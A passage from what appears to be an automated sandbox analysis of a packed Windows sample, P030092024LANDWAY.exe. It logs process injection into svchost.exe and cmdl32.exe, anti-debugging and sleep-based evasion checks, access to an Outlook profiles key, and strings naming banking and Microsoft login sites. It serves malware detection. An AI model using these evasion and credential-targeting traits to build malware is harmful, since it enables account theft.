            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: wininet.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\cmdl32.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: P030092024LANDWAY.exe, Static file information: File size 1054545 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BpYpWzndkWcpUJ.exe, 00000006.00000000.2409444434.000000000084E000.00000002.00000001.01000000.00000005.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4601455514.000000000084E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0040ABAD push esi; ret 2_2_0040ABBD
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0040ABB3 push esi; ret 2_2_0040ABBD
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00407477 push eax; iretd 2_2_0040747E
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00413CE3 push edi; retf 2_2_00413CED
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_004034F0 push eax; ret 2_2_004034F2
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00415654 push esp; ret 2_2_00415655
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00401758 push ecx; retf 2_2_00401766
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx 2_2_038309B6
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_048C09AD push ecx; mov dword ptr [esp], ecx 7_2_048C09B6
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_02718331 push eax; iretd 7_2_0271833B
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_02718094 push es; iretd 7_2_02718095
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_02712161 push esp; ret 7_2_02712162
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_027076C0 push esi; ret 7_2_027076CA
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_027076BA push esi; ret 7_2_027076CA
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_027107F0 push edi; retf 7_2_027107FA
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_02703F84 push eax; iretd 7_2_02703F8B
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452D441 push ebx; retf 7_2_0452D442
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452C42B push cs; iretd 7_2_0452C42E
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452561A push edx; ret 7_2_04525624
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452077F push F754C171h; iretd 7_2_04520786
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452C0C8 pushad ; retf 7_2_0452C0C9
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_045251D7 push ecx; iretd 7_2_045251D8
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452518E push ecx; ret 7_2_0452518F
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_045252CA pushfd ; ret 7_2_045252CB
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_04525EE5 push edi; iretd 7_2_04525EEB
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452CFB2 push ebx; iretd 7_2_0452CFC4
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0452587F push es; ret 7_2_04525899
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_045258DB pushfd ; iretd 7_2_045258E3
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_04524886 push ebp; retf 7_2_04524887
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_04526953 push esi; ret 7_2_04526968
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Code function: 9_2_05036E70 push esi; ret 9_2_05036E80
            Source: initial sample, Static PE information: section name: UPX0
            Source: initial sample, Static PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\cmdl32.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, API/Special instruction interceptor: Address: 416F2B4
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\cmdl32.exe, API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038AD1C0 rdtsc 2_2_038AD1C0
            Source: C:\Windows\SysWOW64\cmdl32.exe, Window / User API: threadDelayed 3556
            Source: C:\Windows\SysWOW64\cmdl32.exe, Window / User API: threadDelayed 6417
            Source: C:\Windows\SysWOW64\svchost.exe, API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdl32.exe, API coverage: 3.0 %
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032, Thread sleep count: 3556 > 30
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032, Thread sleep time: -7112000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032, Thread sleep count: 6417 > 30
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032, Thread sleep time: -12834000s >= -30000s
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224, Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224, Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224, Thread sleep time: -51000s >= -30000s
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224, Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224, Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdl32.exe, Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 7_2_0271C1A0 FindFirstFileW,FindNextFileW,FindClose,7_2_0271C1A0
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: account.microsoft.com/profileVMware20
            Source: 3f75FH48.7.dr, Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 3f75FH48.7.dr, Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 3f75FH48.7.dr, Binary or memory string: discord.comVMware20,11696487552f
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: sswords blocklistVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 3f75FH48.7.dr, Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 3f75FH48.7.dr, Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: global block list test formVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4605387236.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: 3f75FH48.7.dr, Binary or memory string: AMC password management pageVMware20,11696487552
            Source: cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2781629613.00000181670AC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 3f75FH48.7.dr, Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 3f75FH48.7.dr, Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 3f75FH48.7.dr, Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 3f75FH48.7.dr, Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 3f75FH48.7.dr, Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 3f75FH48.7.dr, Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 3f75FH48.7.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 3f75FH48.7.dr, Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: 3f75FH48.7.dr, Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 3f75FH48.7.dr, Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 3f75FH48.7.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Interactive Brokers - EU WestVMware20,1169648
            Source: 3f75FH48.7.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 3f75FH48.7.dr, Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exe, Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cmdl32.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038AD1C0 rdtsc 2_2_038AD1C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00417653 LdrLoadDll,2_2_00417653
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] 2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h] 2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0390539D mov eax, dword ptr fs:[00000030h] 2_2_0390539D
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0388739A mov eax, dword ptr fs:[00000030h] 2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] 2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038533A5 mov eax, dword ptr fs:[00000030h] 2_2_038533A5
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038633A0 mov eax, dword ptr fs:[00000030h] 2_2_038633A0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h] 2_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038EB3D0 mov ecx, dword ptr fs:[00000030h] 2_2_038EB3D0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038EF3E6 mov eax, dword ptr fs:[00000030h] 2_2_038EF3E6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039053FC mov eax, dword ptr fs:[00000030h] 2_2_039053FC
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h] 2_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038B930B mov eax, dword ptr fs:[00000030h] 2_2_038B930B
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] 2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h] 2_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h] 2_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038F132D mov eax, dword ptr fs:[00000030h] 2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0385F32A mov eax, dword ptr fs:[00000030h] 2_2_0385F32A
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03827330 mov eax, dword ptr fs:[00000030h] 2_2_03827330
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0382D34C mov eax, dword ptr fs:[00000030h] 2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03905341 mov eax, dword ptr fs:[00000030h] 2_2_03905341
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03829353 mov eax, dword ptr fs:[00000030h] 2_2_03829353
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h] 2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h] 2_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038EF367 mov eax, dword ptr fs:[00000030h] 2_2_038EF367
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h] 2_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03837370 mov eax, dword ptr fs:[00000030h] 2_2_03837370
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h] 2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905283 mov eax, dword ptr fs:[00000030h]2_2_03905283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386329E mov eax, dword ptr fs:[00000030h]2_2_0386329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386329E mov eax, dword ptr fs:[00000030h]2_2_0386329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C72A0 mov eax, dword ptr fs:[00000030h]2_2_038C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C72A0 mov eax, dword ptr fs:[00000030h]2_2_038C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov eax, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov eax, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov ecx, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov ecx, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038392C5 mov eax, dword ptr fs:[00000030h]2_2_038392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038392C5 mov eax, dword ptr fs:[00000030h]2_2_038392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385F2D0 mov eax, dword ptr fs:[00000030h]2_2_0385F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385F2D0 mov eax, dword ptr fs:[00000030h]2_2_0385F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
